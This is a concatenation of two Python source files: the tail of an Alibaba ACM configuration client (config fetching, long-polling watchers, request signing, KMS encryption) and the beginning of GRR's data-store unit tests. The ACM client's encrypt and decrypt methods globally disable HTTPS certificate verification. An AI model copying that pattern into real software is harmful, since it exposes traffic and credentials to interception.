data_id, group, self.namespace))
delete_file(self.snapshot_base, cache_key)
return None
elif e.code == HTTPStatus.CONFLICT:
logger.error(
"[get-config] config being modified concurrently for data_id:%s, group:%s, namespace:%s" % (
data_id, group, self.namespace))
elif e.code == HTTPStatus.FORBIDDEN:
logger.error("[get-config] no right for data_id:%s, group:%s, namespace:%s" % (
data_id, group, self.namespace))
raise ACMException("Insufficient privilege.")
else:
logger.error("[get-config] error code [:%s] for data_id:%s, group:%s, namespace:%s" % (
e.code, data_id, group, self.namespace))
if no_snapshot:
raise
except Exception as e:
logger.exception("[get-config] exception %s occur" % str(e))
if no_snapshot:
raise
if no_snapshot:
return content
if content is not None:
logger.info(
"[get-config] content from server:%s, data_id:%s, group:%s, namespace:%s, try to save snapshot" % (
truncate(content), data_id, group, self.namespace))
try:
save_file(self.snapshot_base, cache_key, content)
except Exception as e:
logger.exception("[get-config] save snapshot failed for %s, data_id:%s, group:%s, namespace:%s" % (
data_id, group, self.namespace, str(e)))
return content
logger.error("[get-config] get config from server failed, try snapshot, data_id:%s, group:%s, namespace:%s" % (
data_id, group, self.namespace))
content = read_file(self.snapshot_base, cache_key)
if content is None:
logger.warning("[get-config] snapshot is not exist for %s." % cache_key)
else:
logger.debug("[get-config] get %s from snapshot directory, content is %s" % (cache_key, truncate(content)))
return content
def list(self, page=1, size=200):
""" Get config items of current namespace with content included.
Data is directly from acm server.
:param page: which page to query, starts from 1.
:param size: page size.
:return:
"""
logger.info("[list] try to list namespace:%s" % self.namespace)
params = {
"pageNo": page,
"pageSize": size,
"method": "getAllConfigByTenant",
}
if self.namespace:
params["tenant"] = self.namespace
try:
resp = self._do_sync_req("/diamond-server/basestone.do", None, params, None, self.default_timeout)
d = resp.read()
if isinstance(d, bytes):
d = d.decode("utf8")
return json.loads(d)
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
logger.error("[list] no right for namespace:%s" % self.namespace)
raise ACMException("Insufficient privilege.")
else:
logger.error("[list] error code [%s] for namespace:%s" % (e.code, self.namespace))
raise ACMException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[list] exception %s occur" % str(e))
raise
def list_all(self, group=None, prefix=None):
""" Get all config items of current namespace, with content included.
Warning: If there are lots of config in namespace, this function may cost some time.
:param group: only dataIds with group match shall be returned.
:param prefix: only dataIds startswith prefix shall be returned **it's case sensitive**.
:return:
"""
logger.info("[list-all] namespace:%s, group:%s, prefix:%s" % (self.namespace, group, prefix))
def _matches(ori):
return (group is None or ori["group"] == group) and (prefix is None or ori["dataId"].startswith(prefix))
result = self.list(1, 200)
if not result:
logger.warning("[list-all] can not get config items of %s" % self.namespace)
return list()
ret_list = [{"dataId": i["dataId"], "group": i["group"]} for i in result["pageItems"] if _matches(i)]
pages = result["pagesAvailable"]
logger.debug("[list-all] %s items got from acm server" % result["totalCount"])
for i in range(2, pages + 1):
result = self.list(i, 200)
ret_list += [{"dataId": j["dataId"], "group": j["group"]} for j in result["pageItems"] if _matches(j)]
logger.debug("[list-all] %s items returned" % len(ret_list))
return ret_list
@synchronized_with_attr("pulling_lock")
def add_watcher(self, data_id, group, cb):
self.add_watchers(data_id, group, [cb])
@synchronized_with_attr("pulling_lock")
def add_watchers(self, data_id, group, cb_list):
"""Add watchers to specified item.
1. Callback is invoked from current process concurrently by thread pool.
2. Callback is invoked at once if the item exists.
3. Callback is invoked if changes or deletion detected on the item.
:param data_id: dataId.
:param group: group, use "DEFAULT_GROUP" if no group specified.
:param cb_list: callback functions.
:return:
"""
if not cb_list:
raise ACMException("A callback function is needed.")
data_id, group = process_common_params(data_id, group)
logger.info("[add-watcher] data_id:%s, group:%s, namespace:%s" % (data_id, group, self.namespace))
cache_key = group_key(data_id, group, self.namespace)
wl = self.watcher_mapping.get(cache_key)
if not wl:
wl = list()
self.watcher_mapping[cache_key] = wl
for cb in cb_list:
wl.append(WatcherWrap(cache_key, cb))
logger.info("[add-watcher] watcher has been added for key:%s, new callback is:%s, callback number is:%s" % (
cache_key, cb.__name__, len(wl)))
if self.puller_mapping is None:
logger.debug("[add-watcher] pulling should be initialized")
self._init_pulling()
if cache_key in self.puller_mapping:
logger.debug("[add-watcher] key:%s is already in pulling" % cache_key)
return
for key, puller_info in self.puller_mapping.items():
if len(puller_info[1]) < self.pulling_config_size:
logger.debug("[add-watcher] puller:%s is available, add key:%s" % (puller_info[0], cache_key))
puller_info[1].append(cache_key)
self.puller_mapping[cache_key] = puller_info
break
else:
logger.debug("[add-watcher] no puller available, new one and add key:%s" % cache_key)
key_list = self.process_mgr
key_list.append(cache_key)
puller = Thread(target=self._do_pulling, args=(key_list, self.notify_queue))
puller.daemon = True
puller.start()
self.puller_mapping[cache_key] = (puller, key_list)
@synchronized_with_attr("pulling_lock")
def remove_watcher(self, data_id, group, cb, remove_all=False):
"""Remove watcher from specified key.
:param data_id: dataId.
:param group: group, use "DEFAULT_GROUP" if no group specified.
:param cb: callback function.
:param remove_all: weather to remove all occurrence of the callback or just once.
:return:
"""
if not cb:
raise ACMException("A callback function is needed.")
data_id, group = process_common_params(data_id, group)
if not self.puller_mapping:
logger.warning("[remove-watcher] watcher is never started.")
return
cache_key = group_key(data_id, group, self.namespace)
wl = self.watcher_mapping.get(cache_key)
if not wl:
logger.warning("[remove-watcher] there is no watcher on key:%s" % cache_key)
return
wrap_to_remove = list()
for i in wl:
if i.callback == cb:
wrap_to_remove.append(i)
if not remove_all:
break
for i in wrap_to_remove:
wl.remove(i)
logger.info("[remove-watcher] %s is removed from %s, remove all:%s" % (cb.__name__, cache_key, remove_all))
if not wl:
logger.debug("[remove-watcher] there is no watcher for:%s, kick out from pulling" % cache_key)
self.watcher_mapping.pop(cache_key)
puller_info = self.puller_mapping[cache_key]
puller_info[1].remove(cache_key)
if not puller_info[1]:
logger.debug("[remove-watcher] there is no pulling keys for puller:%s, stop it" % puller_info[0])
self.puller_mapping.pop(cache_key)
puller_info[0].terminate()
def _do_sync_req(self, url, headers=None, params=None, data=None, timeout=None):
url = "?".join([url, urlencode(params)]) if params else url
all_headers = self._get_common_headers(params, data)
if headers:
all_headers.update(headers)
logger.debug(
"[do-sync-req] url:%s, headers:%s, params:%s, data:%s, timeout:%s" % (
url, all_headers, params, data, timeout))
tries = 0
while True:
try:
server_info = self.get_server()
if not server_info:
logger.error("[do-sync-req] can not get one server.")
raise ACMRequestException("Server is not available.")
address, port, is_ip_address = server_info
server = ":".join([address, str(port)])
# if tls is enabled and server address is in ip, turn off verification
server_url = "%s://%s" % ("https" if self.tls_enabled else "http", server)
req = Request(url=server_url + url, data=urlencode(data).encode() if data else None,
headers=all_headers)
# for python version compatibility
if python_version_bellow("2.7.9"):
resp = urlopen(req, timeout=timeout)
else:
if self.tls_enabled and is_ip_address:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.check_hostname = False
else:
context = None
resp = urlopen(req, timeout=timeout, context=context)
logger.debug("[do-sync-req] info from server:%s" % server)
return resp
except HTTPError as e:
if e.code in [HTTPStatus.INTERNAL_SERVER_ERROR, HTTPStatus.BAD_GATEWAY,
HTTPStatus.SERVICE_UNAVAILABLE]:
logger.warning("[do-sync-req] server:%s is not available for reason:%s" % (server, e.msg))
else:
raise
except socket.timeout:
logger.warning("[do-sync-req] %s request timeout" % server)
except URLError as e:
logger.warning("[do-sync-req] %s connection error:%s" % (server, e.reason))
tries += 1
if tries >= len(self.server_list):
logger.error("[do-sync-req] %s maybe down, no server is currently available" % server)
raise ACMRequestException("All server are not available")
self.change_server()
logger.warning("[do-sync-req] %s maybe down, skip to next" % server)
def _do_pulling(self, cache_list, queue):
cache_pool = dict()
for cache_key in cache_list:
cache_pool[cache_key] = CacheData(cache_key, self)
while cache_list:
unused_keys = set(cache_pool.keys())
contains_init_key = False
probe_update_string = ""
for cache_key in cache_list:
cache_data = cache_pool.get(cache_key)
if not cache_data:
logger.debug("[do-pulling] new key added: %s" % cache_key)
cache_data = CacheData(cache_key, self)
cache_pool[cache_key] = cache_data
else:
unused_keys.remove(cache_key)
if cache_data.is_init:
contains_init_key = True
data_id, group, namespace = parse_key(cache_key)
probe_update_string += WORD_SEPARATOR.join(
[data_id, group, cache_data.md5 or "", self.namespace]) + LINE_SEPARATOR
for k in unused_keys:
logger.debug("[do-pulling] %s is no longer watched, remove from cache" % k)
cache_pool.pop(k)
logger.debug(
"[do-pulling] try to detected change from server probe string is %s" % truncate(probe_update_string))
headers = {"longPullingTimeout": int(self.pulling_timeout * 1000)}
if contains_init_key:
headers["longPullingNoHangUp"] = "true"
data = {"Probe-Modify-Request": probe_update_string}
changed_keys = list()
try:
resp = self._do_sync_req("/diamond-server/config.co", headers, None, data, self.pulling_timeout + 10)
changed_keys = [group_key(*i) for i in parse_pulling_result(resp.read())]
logger.debug("[do-pulling] following keys are changed from server %s" % truncate(str(changed_keys)))
except ACMException as e:
logger.error("[do-pulling] acm exception: %s, waiting for recovery" % str(e))
time.sleep(1)
except Exception as e:
logger.exception("[do-pulling] exception %s occur, return empty list, waiting for recovery" % str(e))
time.sleep(1)
for cache_key, cache_data in cache_pool.items():
cache_data.is_init = False
if cache_key in changed_keys:
data_id, group, namespace = parse_key(cache_key)
content = self.get_raw(data_id, group)
md5 = hashlib.md5(content.encode("GBK")).hexdigest() if content is not None else None
cache_data.md5 = md5
cache_data.content = content
queue.put((cache_key, cache_data.content, cache_data.md5))
@synchronized_with_attr("pulling_lock")
def _init_pulling(self):
if self.puller_mapping is not None:
logger.info("[init-pulling] puller is already initialized")
return
self.puller_mapping = dict()
self.notify_queue = Queue()
self.callback_tread_pool = pool.ThreadPool(self.callback_tread_num)
self.process_mgr = []
t = Thread(target=self._process_polling_result)
t.setDaemon(True)
t.start()
logger.info("[init-pulling] init completed")
def _process_polling_result(self):
while True:
cache_key, content, md5 = self.notify_queue.get()
logger.debug("[process-polling-result] receive an event:%s" % cache_key)
wl = self.watcher_mapping.get(cache_key)
if not wl:
logger.warning("[process-polling-result] no watcher on %s, ignored" % cache_key)
continue
data_id, group, namespace = parse_key(cache_key)
plain_content = content
if content and is_encrypted(data_id) and self.kms_enabled:
plain_content = self.decrypt(content)
params = {
"data_id": data_id,
"group": group,
"namespace": namespace,
"raw_content": content,
"content": plain_content,
}
for watcher in wl:
if not watcher.last_md5 == md5:
logger.debug(
"[process-polling-result] md5 changed since last call, calling %s" % watcher.callback.__name__)
try:
self.callback_tread_pool.apply(watcher.callback, (params,))
except Exception as e:
logger.exception("[process-polling-result] exception %s occur while calling %s " % (
str(e), watcher.callback.__name__))
watcher.last_md5 = md5
def _refresh_sts_token(self):
if self.sts_token:
if self.sts_token["client_expiration"] - time.mktime(time.gmtime()) > 3 * 60:
return
try:
resp = urlopen("http://100.100.100.200/latest/meta-data/ram/security-credentials/" + self.ram_role_name)
server_time = time.mktime(datetime.strptime(resp.headers["Date"], "%a, %d %b %Y %H:%M:%S GMT").timetuple())
sts_token = json.loads(resp.read().decode("utf8"))
expiration = time.mktime(datetime.strptime(sts_token["Expiration"], "%Y-%m-%dT%H:%M:%SZ").timetuple())
sts_token["client_expiration"] = expiration - server_time + time.mktime(time.gmtime())
self.sts_token = sts_token
except Exception as e:
logger.error("[refresh-sts-token] get sts token failed, due to %s" % e.message)
raise ACMRequestException("Refresh sts token failed.")
def _get_common_headers(self, params, data):
headers = {
"Diamond-Client-AppName": self.app_name,
"Client-Version": VERSION,
"exConfigInfo": "true",
}
if data:
headers["Content-Type"] = "application/x-www-form-urlencoded; charset=GBK"
if self.auth_enabled:
ts = str(int(time.time() * 1000))
if self.ram_role_name:
self._refresh_sts_token()
ak, sk = self.sts_token["AccessKeyId"], self.sts_token["AccessKeySecret"]
headers.update({
"Spas-SecurityToken": self.sts_token["SecurityToken"],
})
else:
ak, sk = self.ak, self.sk
headers.update({
"Spas-AccessKey": ak,
"timeStamp": ts,
})
sign_str = ""
# in case tenant or group is null
if not params and not data:
return headers
tenant = (params and params.get("tenant")) or (data and data.get("tenant"))
group = (params and params.get("group")) or (data and data.get("group"))
if tenant:
sign_str = tenant + "+"
if group:
sign_str = sign_str + group + "+"
if sign_str:
sign_str += ts
headers["Spas-Signature"] = base64.encodebytes(
hmac.new(sk.encode(), sign_str.encode(), digestmod=hashlib.sha1).digest()).decode().strip()
return headers
def _prepare_kms(self):
if not ((self.region_id and self.kms_ak and self.kms_secret) or (self.region_id and self.ram_role_name)):
return False
if not self.kms_client:
if self.ram_role_name:
self.kms_client = AcsClient(region_id=self.region_id,
credential=EcsRamRoleCredential(self.ram_role_name))
else:
self.kms_client = AcsClient(ak=self.kms_ak, secret=self.kms_secret, region_id=self.region_id)
return True
def encrypt(self, plain_txt):
if not self._prepare_kms():
return plain_txt
ssl._create_default_https_context = ssl._create_unverified_context
req = EncryptRequest()
req.set_KeyId(self.key_id)
req.set_Plaintext(plain_txt if type(plain_txt) == bytes else plain_txt.encode("utf8"))
resp = json.loads(self.kms_client.do_action_with_exception(req).decode("utf8"))
return resp["CiphertextBlob"]
def decrypt(self, cipher_blob):
if not self._prepare_kms():
return cipher_blob
ssl._create_default_https_context = ssl._create_unverified_context
req = DecryptRequest()
req.set_CiphertextBlob(cipher_blob)
resp = json.loads(self.kms_client.do_action_with_exception(req).decode("utf8"))
return resp["Plaintext"]
if DEBUG:
ACMClient.set_debugging()
|
data_store_test.py | #!/usr/bin/env python
# -*- mode: python; encoding: utf-8 -*-
"""These are basic tests for the data store abstraction.
Implementations should be able to pass these tests to be conformant.
"""
import csv
import functools
import hashlib
import inspect
import logging
import operator
import os
import random
import string
import tempfile
import thread
import threading
import time
import mock
from grr.lib import access_control
from grr.lib import aff4
from grr.lib import config_lib
from grr.lib import data_store
from grr.lib import flow
from grr.lib import queue_manager
from grr.lib import rdfvalue
from grr.lib import sequential_collection
from grr.lib import test_lib
from grr.lib import threadpool
from grr.lib import worker
from grr.lib.aff4_objects import aff4_grr
from grr.lib.aff4_objects import collects
from grr.lib.aff4_objects import standard
from grr.lib.rdfvalues import client as rdf_client
from grr.lib.rdfvalues import flows as rdf_flows
from grr.lib.rdfvalues import paths as rdf_paths
class StringSequentialCollection(
sequential_collection.IndexedSequentialCollection):
RDF_TYPE = rdfvalue.RDFString
def DeletionTest(f):
"""This indicates a test that uses deletion."""
@functools.wraps(f)
def Decorator(testinstance):
if testinstance.TEST_DELETION:
return f(testinstance)
else:
return testinstance.skipTest("Tests that use deletion are disabled "
"for this data store.")
return Decorator
def DBSubjectLockTest(f):
"""This indicates a test that uses locks."""
@functools.wraps(f)
def Decorator(testinstance):
if testinstance.TEST_DBSUBJECTLOCKS:
return f(testinstance)
else:
return testinstance.skipTest("Tests that use locks are disabled "
"for this data store.")
return Decorator
class _DataStoreTest(test_lib.GRRBaseTest):
"""Test the data store abstraction.
Note that when testing timestamp behavior the cloud bigtable datastore only
has ms precision.
"""
test_row = "aff4:/row:foo"
lease_row = u"aff4:/leasetest"
# This flag controls if tests can also delete data. Some data stores don't
# support deletion so those tests will fail for them.
TEST_DELETION = True
# The same applies to locks.
TEST_DBSUBJECTLOCKS = True
def _ClearDB(self, subjects):
for subject in subjects:
data_store.DB.DeleteSubject(subject, token=self.token)
data_store.DB.Flush()
def setUp(self):
super(_DataStoreTest, self).setUp()
self.InitDatastore()
to_delete = ["aff4:/row:%s" % i for i in range(20)]
to_delete.extend(["aff4:/C/%s" % i for i in range(7)])
to_delete.extend(
[self.test_row, self.lease_row, "aff4:/A/", "aff4:/B/", "aff4:/C/"])
self._ClearDB(to_delete)
self.acls_installed = False
def tearDown(self):
super(_DataStoreTest, self).tearDown()
self.DestroyDatastore()
def InitDatastore(self):
"""Initiates custom data store."""
def DestroyDatastore(self):
"""Destroys custom data store."""
def _TruncateToMilliseconds(self, timestamp_int):
timestamp_int -= (timestamp_int % 1000)
return timestamp_int
def testSetResolve(self):
"""Test the Set() and Resolve() methods."""
predicate = "task:00000001"
value = rdf_flows.GrrMessage(session_id="session")
# Ensure that setting a value is immediately available.
data_store.DB.Set(self.test_row, predicate, value, token=self.token)
time.sleep(1)
data_store.DB.Set(self.test_row + "X", predicate, value, token=self.token)
stored_proto, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
stored_proto = rdf_flows.GrrMessage.FromSerializedString(stored_proto)
self.assertEqual(stored_proto.session_id, value.session_id)
def testMultiSet(self):
"""Test the MultiSet() methods."""
unicode_string = u"this is a uñîcödé string"
data_store.DB.MultiSet(
self.test_row, {
"aff4:size": [1],
"aff4:stored": [unicode_string],
"aff4:unknown_attribute": ["hello"]
},
token=self.token)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
# Make sure that unknown attributes are stored as bytes.
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:unknown_attribute", token=self.token)
self.assertEqual(stored, "hello")
self.assertEqual(type(stored), str)
def testMultiSetTimestamps(self):
unicode_string = u"this is a uñîcödé string"
data_store.DB.MultiSet(
self.test_row,
{"aff4:size": [(1, 1000)],
"aff4:stored": [(unicode_string, 2000)]},
token=self.token)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
self.assertEqual(ts, 1000)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
self.assertEqual(ts, 2000)
def testMultiSetNoneTimestampIsNow(self):
unicode_string = u"this is a uñîcödé string"
start_time = time.time() * 1e6
# Test None timestamp is translated to current time.
data_store.DB.MultiSet(
self.test_row,
{"aff4:size": [(1, None)],
"aff4:stored": [(unicode_string, 2000)]},
token=self.token)
end_time = time.time() * 1e6
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
self.assertGreaterEqual(ts, start_time)
self.assertLessEqual(ts, end_time)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
self.assertEqual(ts, 2000)
def testMultiSetAsync(self):
"""Test the async MultiSet() methods."""
unicode_string = u"this is a uñîcödé string"
data_store.DB.MultiSet(
self.test_row, {
"aff4:size": [3],
"aff4:stored": [unicode_string],
"aff4:unknown_attribute": ["hello"]
},
sync=False,
token=self.token)
# Force the flusher thread to flush.
data_store.DB.flusher_thread.target()
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 3)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, unicode_string)
# Make sure that unknown attributes are stored as bytes.
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:unknown_attribute", token=self.token)
self.assertEqual(stored, "hello")
self.assertEqual(type(stored), str)
def testMultiSet2(self):
"""Test the MultiSet() methods."""
# Specify a per element timestamp
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [(1, 1000)],
"aff4:stored": [("2", 2000)]},
token=self.token)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
self.assertEqual(ts, 1000)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, "2")
self.assertEqual(ts, 2000)
def testMultiSet3(self):
"""Test the MultiSet() delete methods."""
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [1],
"aff4:stored": ["2"]},
token=self.token)
data_store.DB.MultiSet(
self.test_row, {"aff4:stored": ["2"]},
to_delete=["aff4:size"],
token=self.token)
# This should be gone now
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertIsNone(stored)
stored, _ = data_store.DB.Resolve(
self.test_row, "aff4:stored", token=self.token)
self.assertEqual(stored, "2")
def testMultiSet4(self):
"""Test the MultiSet() delete methods when deleting the same predicate."""
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [1],
"aff4:stored": ["2"]},
token=self.token)
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [4]},
to_delete=["aff4:size"],
token=self.token)
# This should only produce a single result
count = 0
for count, (predicate, value, _) in enumerate(
data_store.DB.ResolvePrefix(
self.test_row,
"aff4:size",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)):
self.assertEqual(value, 4)
self.assertEqual(predicate, "aff4:size")
self.assertEqual(count, 0)
def testMultiSetSetsTimestapWhenReplacing(self):
data_store.DB.MultiSet(
self.test_row, {"aff4:size": [(1, 1000)]},
replace=True,
token=self.token)
stored, ts = data_store.DB.Resolve(
self.test_row, "aff4:size", token=self.token)
self.assertEqual(stored, 1)
self.assertEqual(ts, 1000)
def testMultiSetRemovesOtherValuesWhenReplacing(self):
values = data_store.DB.ResolvePrefix(
self.test_row,
"aff4:stored",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
data_store.DB.MultiSet(
self.test_row, {"aff4:stored": [("2", 1000), ("3", 4000)]},
replace=False,
token=self.token)
values = data_store.DB.ResolvePrefix(
self.test_row,
"aff4:stored",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertListEqual(values, [("aff4:stored", "3", 4000), ("aff4:stored",
"2", 1000)])
data_store.DB.MultiSet(
self.test_row, {"aff4:stored": [("4", 3000)]},
replace=True,
token=self.token)
values = data_store.DB.ResolvePrefix(
self.test_row,
"aff4:stored",
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
self.assertListEqual(values, [("aff4:stored", "4", 3000)])
@DeletionTest
def testDeleteAttributes(self):
"""Test we can delete an attribute."""
predicate = "metadata:predicate"
data_store.DB.Set(self.test_row, predicate, "hello", token=self.token)
# Check it's there.
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, "hello")
data_store.DB.DeleteAttributes(
self.test_row, [predicate], sync=True, token=self.token)
stored, _ = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertIsNone(stored)
@DeletionTest
def testMultiDeleteAttributes(self):
"""Test we can delete multiple attributes at once."""
test_rows = ["aff4:/row/%i" % i for i in range(0, 10)]
predicate_1 = "metadata:predicate1"
predicate_2 = "metadata:predicate2"
for row in test_rows:
data_store.DB.Set(row, predicate_1, "hello", token=self.token)
data_store.DB.Set(row, predicate_2, "hello", token=self.token)
self.assertEqual(10,
sum(1
for _ in data_store.DB.ScanAttribute(
"aff4:/row/", predicate_1, token=self.token)))
self.assertEqual(10,
sum(1
for _ in data_store.DB.ScanAttribute(
"aff4:/row/", predicate_2, token=self.token)))
data_store.DB.MultiDeleteAttributes(
test_rows, [predicate_1, predicate_2], token=self.token)
self.assertEqual(0,
sum(1
for _ in data_store.DB.ScanAttribute(
"aff4:/row/", predicate_1, token=self.token)))
self.assertEqual(0,
sum(1
for _ in data_store.DB.ScanAttribute(
"aff4:/row/", predicate_2, token=self.token)))
def CheckLength(self, predicate, l):
all_attributes = data_store.DB.ResolveMulti(
self.test_row, [predicate], timestamp=(0, 5000), token=self.token)
self.assertEqual(len(list(all_attributes)), l)
def CheckLast(self, predicate, expected_value, exptected_ts):
stored, ts = data_store.DB.Resolve(
self.test_row, predicate, token=self.token)
self.assertEqual(stored, expected_value)
self.assertEqual(ts, exptected_ts)
@DeletionTest
def testDeleteAttributesTimestamps(self):
"""Test we can delete an attribute in a time range."""
predicate = "metadata:tspredicate"
data_store.DB.Set(
self.test_row,
predicate,
"hello1000",
timestamp=1000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate,
"hello2000",
timestamp=2000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate,
"hello3000",
timestamp=3000,
replace=False,
token=self.token)
data_store.DB.Set(
self.test_row,
predicate,
"hello4000",
timestamp=4000,
replace=False,
token=self.token)
# Check its there
self.CheckLast(predicate, "hello4000", 4000)
self.CheckLength(predicate, 4)
# Delete timestamps between 0 and 1500.
data_store.DB.DeleteAttributes(
self.test_row, [predicate],
start=0,
end=1500,
sync=True,
token=self.token)
self.CheckLast(predicate, "hello4000", 4000)
self.CheckLength(predicate, 3)
# Delete timestamps between 3000 and 4500.
data_store.DB.DeleteAttributes(
self.test_row, [predicate],
start=3000,
end=4500,
sync=True,
token=self.token)
self.CheckLast(predicate, "hello2000", 2000)
self.CheckLength(predicate, 1)
# Delete everything.
data_store.DB.DeleteAttributes(
self.test_row, [predicate],
start=0,
end=5000,
sync=True,
token=self.token)
self.CheckLast(predicate, None, 0)
self.CheckLength(predicate, 0)
@DeletionTest
def testDeleteSubject(self):
predicate = "metadata:tspredicate"
data_store.DB.Set(
self.test_row,
predicate,
"hello1000",
timestamp=1000,
replace=False,
token=self.token)
data_store.DB.DeleteSubject(self.test_row, token=self.token)
data_store.DB.Flush()
self.CheckLength(predicate, 0)
# This should work with the sync argument too.
data_store.DB.Set(
self.test_row,
predicate,
"hello1000",
timestamp=1000,
replace=False,
token=self.token)
data_store.DB.DeleteSubject(self.test_row, token=self.token, sync=True)
self.CheckLength(predicate, 0)
@DeletionTest
def testDeleteSubjects(self):
row_template = "aff4:/deletesubjectstest%d"
rows = [row_template % i for i in xrange(100)]
predicate = "metadata:tspredicate"
for i, row in enumerate(rows):
data_store.DB.Set(
row,
predicate,
"hello%d" % i,
timestamp=1000,
replace=False,
token=self.token)
data_store.DB.Flush()
data_store.DB.DeleteSubjects(rows[20:80], token=self.token)
data_store.DB.Flush()
res = dict(
data_store.DB.MultiResolvePrefix(rows, predicate, token=self.token))
for i in xrange(100):
if 20 <= i < 80:
# These rows have been deleted.
self.assertNotIn(row_template % i, res)
else:
# These rows should be present.
self.assertIn(row_template % i, res)
def testMultiResolvePrefix(self):
"""tests MultiResolvePrefix."""
rows = self._MakeTimestampedRows()
subjects = dict(
data_store.DB.MultiResolvePrefix(
rows, ["metadata:3", "metadata:7"], token=self.token))
subject_names = subjects.keys()
subject_names.sort()
self.assertEqual(len(subjects), 2)
self.assertEqual(subject_names, [u"aff4:/row:3", u"aff4:/row:7"])
rows = []
for r in range(1, 6):
row_name = "aff4:/prefix_row_%d" % r
rows.append(row_name)
for i in range(1, 6):
timestamp = rdfvalue.RDFDatetime(1000 * i)
data_store.DB.Set(
row_name,
"metadata:%s" % ("X" * i),
str(i),
timestamp=timestamp,
token=self.token)
subjects = dict(
data_store.DB.MultiResolvePrefix(rows, ["metadata:"], token=self.token))
self.assertItemsEqual(subjects.keys(), rows)
row = subjects["aff4:/prefix_row_4"]
self.assertEqual(len(row), 5)
subjects = dict(
data_store.DB.MultiResolvePrefix(
rows, ["metadata:XXX"], token=self.token))
self.assertItemsEqual(subjects.keys(), rows)
for row in subjects.values():
# Those with 3-5 X's.
self.assertEqual(len(row), 3)
self.assertIn((u"metadata:XXX", "3", 3000), row)
self.assertNotIn((u"metadata:XX", "2", 2000), row)
# Test unicode subjects.
unicode_string = u"this is a uñîcödé string"
attributes = set()
for i in range(5, 10):
attributes.add(("metadata:%s" % i, "data%d" % i))
data_store.DB.MultiSet(
unicode_string, {"metadata:%s" % i: ["data%d" % i]}, token=self.token)
result = dict(
data_store.DB.MultiResolvePrefix(
[unicode_string], ["metadata:"], token=self.token))
result_set = set((k, v) for k, v, _ in result[unicode_string])
self.assertEqual(result_set, attributes)
def _MakeTimestampedRows(self):
# Make some rows.
rows = []
for i in range(1, 6):
row_name = "aff4:/row:%s" % i
timestamp = rdfvalue.RDFDatetime(1000 * i)
data_store.DB.Set(
row_name, "metadata:%s" % i, i, timestamp=timestamp, token=self.token)
rows.append(row_name)
for i in range(6, 11):
row_name = "aff4:/row:%s" % i
timestamp = rdfvalue.RDFDatetime(1000 * i)
data_store.DB.MultiSet(
row_name, {"metadata:%s" % i: [i]},
timestamp=timestamp,
token=self.token)
rows.append(row_name)
return rows
def _CheckResultTimestamps(self, result, expected_timestamps):
timestamps = []
for predicates in result.itervalues():
for predicate in predicates:
timestamps.append(predicate[2])
self.assertListEqual(sorted(timestamps), sorted(expected_timestamps))
def testMultiResolvePrefixTypePreservation(self):
"""Check result subjects have same format as original calls."""
rows = [
"aff4:/row:str",
u"aff4:/row:unicode",
rdfvalue.RDFURN("aff4:/row:URN"),
"aff4:/row:str",
u"aff4:/row:unicode",
rdfvalue.RDFURN("aff4:/row:URN"),
]
i = 0
for row_name in rows:
timestamp = rdfvalue.RDFDatetime(1000 + i)
data_store.DB.Set(
row_name, "metadata:%s" % i, i, timestamp=timestamp, token=self.token)
i += 1
subjects = dict(
data_store.DB.MultiResolvePrefix(
rows, ["metadata:0", "metadata:2", "metadata:4"], token=self.token))
self.assertEqual(
set([type(s) for s in subjects]), set([type(s) for s in rows]))
self.assertIn(rows[0], subjects)
self.assertIn(rows[2], subjects)
self.assertIn(rows[4], subjects)
def testResolvePrefixResultsOrderedInDecreasingTimestampOrder1(self):
predicate1 = "metadata:predicate1"
subject = "aff4:/test_resolve_regex_results_order_in_dec_order1"
# Set 100 values with increasing timestamps.
for i in range(100):
data_store.DB.Set(
subject,
predicate1,
str(i),
timestamp=i * 1000,
replace=False,
token=self.token)
# Check that results will be returned in decreasing timestamp order.
# This test along with a next one tests that no matter how
# values were set, they will be sorted by timestamp in the decreasing
# order when fetched.
result = data_store.DB.ResolvePrefix(
subject,
predicate1,
timestamp=data_store.DB.ALL_TIMESTAMPS,
token=self.token)
for result_index, i in enumerate(reversed(range(100))):
self.assertEqual(result[result_index], (predicate1, str(i), i * 1000))
def testResolvePrefixResultsOrderedInDecreasingTimestampOrder2(self):
predicate1 = "metadata:predicate1"
subject = "aff4:/test_resolve_regex_results_order_in_dec_order2"
# Set 100 values with timestamps starting in the future and going to
# the past.
for i in reversed(range(100)):
data_store.DB.Set(
subject,
predicate1,
str(i),
